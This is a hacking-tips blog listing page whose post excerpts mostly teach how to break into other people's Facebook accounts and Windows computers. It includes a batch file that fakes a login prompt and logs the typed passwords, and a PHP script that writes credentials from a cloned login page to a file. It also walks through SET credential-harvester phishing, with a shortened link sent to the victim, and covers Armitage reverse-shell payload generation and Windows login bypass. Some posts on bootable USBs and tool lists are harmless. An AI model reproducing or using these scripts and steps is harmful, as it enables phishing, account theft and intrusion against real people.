Posts

Showing posts with the label COMPUTER HACKING AND TRICKS

Online Account Hacking

Online account hacking: Accounts can be hacked using online hacking tools that uses some information about the account and using that it can crack up the accounts.Online tools are pre programed to do so and can be the easiest way to hack passwords if you are familier with some of the information of account.Following are some of the best online hacking tools that you can use: a)Brutus: Many consider it to be the fastest online password hacking tool and is also free and available for both Linux and Windows.It supports password cracking in HTTP,POP3,FTP,SMB,Telnet and other types such as IMAP,NNTP,Netbus,etc.Brutus is open source tool and is best for doing online hacking of many types of accounts. b) THC-Hydra: Probably the most widely used online hacking tool that is capable of hacking web form authentication and when it is used with other tools like Tamper Data,it can become a powerful and effective tool for cracking nearly every type of online password authentica...

Hacking Facebook in Windows

Hacking Facebook account using Notepad and cmd in Windows Today  khmerstarit will show you how to hack facebook account using CMD. Now follow my steps: 1. Open notepad and copy these codes @echo off color a title Login echo Please Enter Email Address And Password echo. echo. cd "C:\Logs" set /p user=Username: set /p pass=Password: echo Username="%user%" Password="%Pass%">Logs.txt start www.facebook.com exit 2.Save it as khmerstarit.bat 3.Click on your c drive and create a folder named logs. 4. Now create a shortcut file of that bat. 5. then right click on the shortcut one and click on properties. And change the icon Download a facebook icon from google.

Facebook Hacking using SET and Armitage

Hacking Facebook Account With SET And Ettercap Hello Everyone, here’s another simple tutorial for hacking facebook account using SET and Ettercap In this method whenever victim opens facebook.com the victim will automatically redirected to our fake facebook page.So it sounds little Good so why late lets start the attack Requirements: Attacker’s machine: KALI LINUX victim’s machine: Any os(win 7, 8, 8.1,10) STEPS: 1.Boot kali linux , open terminal and type setoolkit and press enter. 2. Now select 1 and hit enter 3. Now select 2 and press enter. 4. Now select credential harvester attack , i.e option-3 and press enter. 5. select option 2 again and hit enter. 6.Now we have to enter our ip address for post back method. 7. open new terminal and type ifconfig and copy your ip address. 8. Now paste that ip address in previous terminal and press enter. 9. Enter the url of facebook as https://www.faceboo k.com 10.Now login page of facebook will be cloned with...

Password Breaking Tools

How To Hack Accounts Passwords -Password Breaking Tools  1.Password hashes: Passwords that you type in your computer operating systems are stored somewhere on the disc in the form of hashes.These hashes are not in clear text therefore to access these hashes root/sysadmin privilages are required.In windows operating system these hashes are stored on the local disc in the SAM file,while in linux stores these hashes in /etc/shadow file.Hence to encrypt out the password out of these hashes the root access is required and therefore the password can only be cracked by this process only if the operating system can be in your control for some time or you can use the system by your own. a)Dictionary: Using dictionary attack to find the password out of hashes is the simplest and fastest method.It just runs through dictionary of words and tries each one of them to check whether it works or not.It could seem to be impossible if it has to be done manually as one cannot try ...

Hacking Windows Pc with Armitage

Hack windows pc with Armitage in Kalilinux  Hello readers,here is a another kali linux tutorial for you to hack a windows pc graphically using Armitage. Armitage is a preinstalled tool in kalilinux so lets begin attack Requirements : Kali linux (live machine or host machine) Victim (Windows pc 10/8.1/8/7/xp) Step1: Open kali linux and click on Armitage and connect it . Step2 :Now it will open Armitage interface and it also shows available victim PC in your network. armitage kali liux 3.Now select the target machine. Here we selecting Windows pc . 4.From the left panel selectPayload>Windows>Meterpreter>reverse_tcp and change port address as your wish here I am giving (port6565)and set output asEXE and launch it armitage kali linux Step5 : It will generate .exe payload to you so you have to save that .exe payload in your pc. Step6 :Now again open from the left panel selectPayload>Windows>Meterpreter>reverse_tcp and change port address to previou...

Best Bootable USB Creation

Best Bootable USB Creation Creating and using bootable USB devices for installing new operating system have many advantages over installing from bootable DVD. The USB driveis *.Easy to create, erase and reuse. *.Can install multiple OS on same USB at a time. *.Faster booting and installation speed. *.Portable and easy to handle. *.Using the bootable USB for testing Live Linux OS, you can install temporary software

Tools Required to Load Windows 7 Installation

Tools Required to Load Windows 7 Installation Files: 1.USB flash drive with a minimum capacity of 4 GB. 2.Windows or Linux ISO files 3.BOOTABLE Softwares-> There are so many Bootable softwares Here we are usingUniversal Usb Installer can download from here. Open yourUniversal Usb Installer Step 1: Select your Os to install From drop down. Step2:Browse your iso file from your Pc. Step3: Select Usb drive . Step 4: Click on Create. Now its creating your Usb drive bootable It takes time based on your ISO file size. After Installation Complete safely remove the pendrive from PC.

Hacking Facebook account using Phishing

H ow to hack facebook account in windows using phishing? This is one of the common method to hack facebook account. STEP 1:Creating Phishing.php file :1. Even if you don’t have any knowledge of php file simply copy the following script and saveit as phishing.php .:<?phpheader(“Location: https://www.facebook.com/login.php ”);$handle = fopen(“passwords.txt”, “a”);foreach($_GET as$variable => $value) {fwrite($handle,$variable);fwrite($handle, “=”);fwrite($handle, $value);fwrite($h andle, “rn”);}fwrite($handle, “rn”);fclose($handle);exit;?> STEP 2: Creating index.html page : 1. Open the Facebook login page then, Right click>View page source and paste it in notepad and save it aindex.html 2. Open thatindex.htmlfile with a Notepad and search (By pressing Ctrl F) for : action in it and replace the highlighted part (as in the following screenshot) with phishing.php . 3. search (By pressing Ctrl F) for : method in it and replace the highlighted part (post) with...

Hacking Facbook usin SET (Social Enggineering Toolkit)

How to hack facebook account using kali linux 2.0 1. Download and setup Kali Linux 2. Fire up terminal and type sudo for getting root permission 3. Enter your root username and password 4. Now open social engineering toolkit by typing setoolkit in terminal 5. Enter"1"to doSocial-Engineering Attacks 6. Then Enter"2"to selectWebsite Attack Vectors 7. Enter"3"to selectcredential harvester attackmethod 8. Enter"2"as we want to hack facebook with a clone webpage|phishing attack 9.Open a new terminal and typeifconfig 10.Then copy-paste the IP 11.Now enterurlof site you want to clone ( https://www.facebook.com ) 12. Nowshorten your IP address usingadf.lyorgoo.glWhy we are shortening the like because links will look less spammy 13. Now it's time to send shortened link tothe victim 14. As and when victim enter there credential the info appear in the terminal.  I am not responsible for any crime, do it on yo...

How to Hack Into a Computer Without an Account

How to Hack Into a Computer Without an Account If you have reason to access a computer without an account, you'll need to navigate to the "Safe Mode with Command Prompt" and change the password. You should then be able to restart the computer and enter the new password for the account you hacked. This method only works for Windows operating systems. StepsEdit 1.1 Turn on the Computer. 2.2 Before it shows the Windows Logo, start repeatedly pressing the F8 key. 3.3 Use the up/down keys to navigate your way to "Safe Mode with Command Prompt" and press enter. (After this the screen will appear dark and will show a bunch of computer codes. Don't be afraid, this will only go on for a little while. Just make sure no one else comes in when the screen is like that). Then it will go to the account/login screen 4.4 Notice there will be a new account called "Administrator". 5.5 Click on it and then you"ll go to "Safe mode...

SOFTWARES FOR HACKERS

Image
TOP TEN SOFTWARES FOR HACKERS Welcome to our Hacker Tools list of 2017… Since 2014 we’ve listed the web’s favorite hacking/ pentesting tools as used by hackers, geeks and security engineers. This list sprung to life when we organized an online poll that was very well received and the below recommended tools are a result of what our community voted as the ‘Top Ten List of Hacking Tools’. We’ve organized this list by including information and links to training courses for each of these tools as well as books, training course and additional information that we think will help you learn! Our more extensive list of hacking tools is located here that include tools from the following hacking/ pentesting categories: Application Specific Scanners, Debuggers, Encryption Tools, Firewalls, Forensics, Fuzzers, Intrusion Detection Systems, Multi Purpose Tools, Packet Crafting Tools, Packet Sniffers, Password Crackers, Port Scanners, Linux Hacking Distros, Rootkit Detectors, Traf...

OPERATING SYSTEM FOR HACKERS

Image
Top 17 Operating System for Hackers 1. Kali Linux Kali Linux maintained and funded by Offensive Security Ltd. is first in our list. Kali Linux is a Debian-derived Linux distribution designed for digital forensics and penetration testing. Kali is the one of the best and favourite operating systems of hackers. It was developed by Mati Aharoni and Devon Kearns of Offensive Security through the rewrite of BackTrack, their previous forensics Linux distribution based on Ubuntu. Kali Linux has a dedicated project set-aside for compatibility and porting to specific Android devices, called Kali Linux NetHunter. It is the first Open Source Android penetration testing platform for Nexus devices, created as a joint effort between the Kali community member “BinkyBear” and Offensive Security. It supports Wireless 802.11 frame injection, one-click MANA Evil Access Point setups, HID keyboard (Teensy like attacks), as well as Bad USB MITM attacks. Features :...